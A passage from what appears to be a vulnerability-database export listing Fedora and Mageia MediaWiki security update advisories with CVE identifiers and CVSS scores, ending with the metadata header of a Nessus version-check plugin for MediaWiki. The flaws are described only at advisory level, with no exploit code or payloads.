", "cvss3": {}, "published": "2014-02-07T03:09:15", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.21.5-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610"], "modified": "2014-02-07T03:09:15", "id": "FEDORA:1025E2165F", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GXMKFYBIAHHZE2T2YGCUW5KTCYUJZAS7/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.23.4/README.RPM. Remember to remove the config dir after completing the configuration. 
", "cvss3": {}, "published": "2014-10-06T05:04:38", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.23.4-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7199"], "modified": "2014-10-06T05:04:38", "id": "FEDORA:EF92821EA9", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/UM7Z5EHM5KGJMMKUYLYV6ZP4TS4R7RPB/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. 
", "cvss3": {}, "published": "2014-10-06T05:05:28", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.4-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7199"], "modified": "2014-10-06T05:05:28", "id": "FEDORA:CAA3F21DF3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/XL6BJ5BHOVLRS2V6PMNJJSA55IDTCMIY/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. 
", "cvss3": {}, "published": "2014-10-14T04:36:28", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.5-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "modified": "2014-10-14T04:36:28", "id": "FEDORA:68E1360D7018", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3WTETZPYZYGTJ5BI2QJEMI7RNSVZA3RW/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.23.5/README.RPM. Remember to remove the config dir after completing the configuration. 
", "cvss3": {}, "published": "2014-10-14T04:43:12", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.23.5-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "modified": "2014-10-14T04:43:12", "id": "FEDORA:9392B60CA53E", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/VX3N3TV7ROUT3YQ62CD7EO46YFUZLHE3/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.23.7/README.RPM. Remember to remove the config dir after completing the configuration. 
", "cvss3": {}, "published": "2014-12-12T04:24:17", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.23.7-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "modified": "2014-12-12T04:24:17", "id": "FEDORA:03ECD60DC901", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/VNNLIAWGBQXFJM7YREYTBNEJIN7RZBAW/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. 
", "cvss3": {}, "published": "2014-12-12T04:34:24", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.7-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "modified": "2014-12-12T04:34:24", "id": "FEDORA:99FA160CBEF5", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/TRZKJ2MNN7ITVS6YOYNYZM7TS6Q653ZP/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. 
", "cvss3": {}, "published": "2014-12-29T10:04:19", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.8-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "modified": "2014-12-29T10:04:19", "id": "FEDORA:D3C0160CE2C3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KC4MGP4QEGIANCRADSBQ4LY7MG22PCVJ/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.23.8/README.RPM. Remember to remove the config dir after completing the configuration. 
", "cvss3": {}, "published": "2014-12-29T10:05:00", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.23.8-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "modified": "2014-12-29T10:05:00", "id": "FEDORA:BFF2560CE4A3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/XNS5HBACEMJWO7JQTOEQIHNQKPLRPVS4/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. 
", "cvss3": {}, "published": "2015-04-18T09:37:06", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.9-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "modified": "2015-04-18T09:37:06", "id": "FEDORA:312EC6016164", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3HK6NB3ACCBLDBEOOAR5ENSEYY6NWCOZ/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. 
", "cvss3": {}, "published": "2014-04-09T01:00:28", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.21.8-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2665"], "modified": "2014-04-09T01:00:28", "id": "FEDORA:380E022043", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZQHCO7LGH4NKT542RRZ6KJHLSSO6XVFV/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.21.8/README.RPM. Remember to remove the config dir after completing the configuration. 
", "cvss3": {}, "published": "2014-04-09T01:03:53", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.21.8-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2665"], "modified": "2014-04-09T01:03:53", "id": "FEDORA:A746520CC1", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/UBLZFLUP2GS36GQCC47I4BMULVM3PNK4/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.21.6/README.RPM. Remember to remove the config dir after completing the configuration. 
", "cvss3": {}, "published": "2014-03-11T04:08:52", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.21.6-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2242", "CVE-2014-2243", "CVE-2014-2244"], "modified": "2014-03-11T04:08:52", "id": "FEDORA:1D19E21D3E", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JEOLZGYOL3LTXU6PTPLS743VOQ3GPBQF/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. 
", "cvss3": {}, "published": "2014-03-11T04:15:05", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.21.6-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2242", "CVE-2014-2243", "CVE-2014-2244"], "modified": "2014-03-11T04:15:05", "id": "FEDORA:23311215C1", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QFOYRM5ODOUQDJCBDPIEIHV6VAF5MONB/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "MediaWiki user Michael M reported that the fix for CVE-2013-4568 allowed insertion of escaped CSS values which could pass the CSS validation checks, resulting in XSS (CVE-2013-6451). Chris from RationalWiki reported that SVG files could be uploaded that include external stylesheets, which could lead to XSS when an XSL was used to include JavaScript (CVE-2013-6452). During internal review, it was discovered that MediaWiki's SVG sanitization could be bypassed when the XML was considered invalid (CVE-2013-6453). During internal review, it was discovered that MediaWiki displayed some information about deleted pages in the log API, enhanced RecentChanges, and user watchlists (CVE-2013-6472). Netanel Rubin from Check Point discovered a remote code execution vulnerability in MediaWiki's thumbnail generation for DjVu files. 
Internal review also discovered similar logic in the PdfHandler extension, which could be exploited in a similar way (CVE-2014-1610). MediaWiki has been updated to version 1.22.2, which fixes these issues, as well as several others. Also, the mediawiki-ldapauthentication and mediawiki-math extensions have been updated to newer versions that are compatible with MediaWiki 1.22. Additionally, the mediawiki-graphviz extension has been obsoleted, due to the fact that it is unmaintained upstream and is vulnerable to cross-site scripting attacks. Note: if you were using the \"instances\" feature in these packages to support multiple wiki instances, this feature has now been removed. You will need to maintain separate wiki instances manually. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2014-03-02T20:53:30", "type": "mageia", "title": "Updated mediawiki packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4568", "CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6472", "CVE-2014-1610"], "modified": "2014-03-02T20:53:30", "id": "MGASA-2014-0113", "href": 
"https://advisories.mageia.org/MGASA-2014-0113.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T11:19:34", "description": "MediaWiki before 1.23.2 is vulnerable to JSONP injection in Flash (CVE-2014-5241), XSS in mediawiki.page.image.pagination.js (CVE-2014-5242), and clickjacking between OutputPage and ParserOutput (CVE-2014-5243). This update provides MediaWiki 1.23.2, fixing these and other issues. \n", "cvss3": {}, "published": "2014-08-05T20:08:48", "type": "mageia", "title": "Updated mediawiki packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5241", "CVE-2014-5242", "CVE-2014-5243"], "modified": "2014-08-05T20:08:48", "id": "MGASA-2014-0309", "href": "https://advisories.mageia.org/MGASA-2014-0309.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Updated mediawiki packages fix security vulnerability: XSS vulnerability in MediaWiki before 1.22.6, where if the default sort key is set to a string containing a script, the script will be executed when the page is viewed using the info action (CVE-2014-2853). 
\n", "cvss3": {}, "published": "2014-04-28T18:16:23", "type": "mageia", "title": "Updated mediawiki packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2853"], "modified": "2014-04-28T18:16:23", "id": "MGASA-2014-0197", "href": "https://advisories.mageia.org/MGASA-2014-0197.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "nessus": [{"lastseen": "2022-04-16T14:08:33", "description": "According to its version number, the instance of MediaWiki running on the remote host is affected by the following vulnerabilities :\n\n - A flaw exists due to comments not being prepended to the JSONP callbacks. This allows a remote attacker, using a specially crafted SWF file, to perform a cross-site request forgery attack. (CVE-2014-5241)\n\n - A cross-site scripting vulnerability exists within the 'mediawiki.page.image.pagination.js' script due to a failure to validate user-supplied input when the function 'ajaxifyPageNavigation' calls 'loadPage'. 
This allows a remote attacker, using a specially crafted request, to execute arbitrary script code within the trust relationship between the browser and server.\n (CVE-2014-5242)\n\n - A flaw exists with the iFrame protection mechanism, related to 'OutputPage' and 'ParserOutput', which allows a remote attacker to conduct a clickjacking attack.\n (CVE-2014-5243)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2014-08-13T00:00:00", "type": "nessus", "title": "MediaWiki < 1.19.18 / 1.22.9 / 1.23.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5241", "CVE-2014-5242", "CVE-2014-5243"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:mediawiki:mediawiki"], "id": "MEDIAWIKI_1_23_2.NASL", "href": "https://www.tenable.com/plugins/nessus/77183", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77183);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-5241\", \"CVE-2014-5242\", \"CVE-2014-5243\");\n script_bugtraq_id(69135, 69136, 69137);\n\n script_name(english:\"MediaWiki < 1.19.18 / 1.22.9 / 1.23.2 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the instance of MediaWiki running on\nthe remote host is affected by the following vulnerabilities :\n\n - A flaw exists due to comments not being prepended to the\n JSONP callbacks. 
This allows a remote attacker, using a\n specially crafted SWF file, to perform a cross-site\n request forgery attack. (CVE-2014-5241)\n\n - A cross-site scripting vulnerability exists within the\n 'mediawiki.page.image.pagination.js' script due to a\n failure to validate user-supplied input when the\n function 'ajaxifyPageNavigation' calls 'loadPage'. This\n allows a remote attacker, using a specially crafted\n request, to execute arbitrary script code within the\n trust relationship between the browser and server.\n (CVE-2014-5242)\n\n - A flaw exists with the iFrame protection mechanism,\n related to 'OutputPage' and 'ParserOutput', which allows\n a remote attacker to conduct a clickjacking attack.\n (CVE-2014-5243)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-July/000157.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1ee4304d\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.19#MediaWiki_1.19.18\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.22#MediaWiki_1.22.9\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.23#MediaWiki_1.23.2\");\n script_set_attribute(attribute:\"see_also\", value:\"https://phabricator.wikimedia.org/T70187\");\n script_set_attribute(attribute:\"see_also\", value:\"https://phabricator.wikimedia.org/T68608\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MediaWiki version 1.19.18 / 1.22.9 / 1.23.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n 
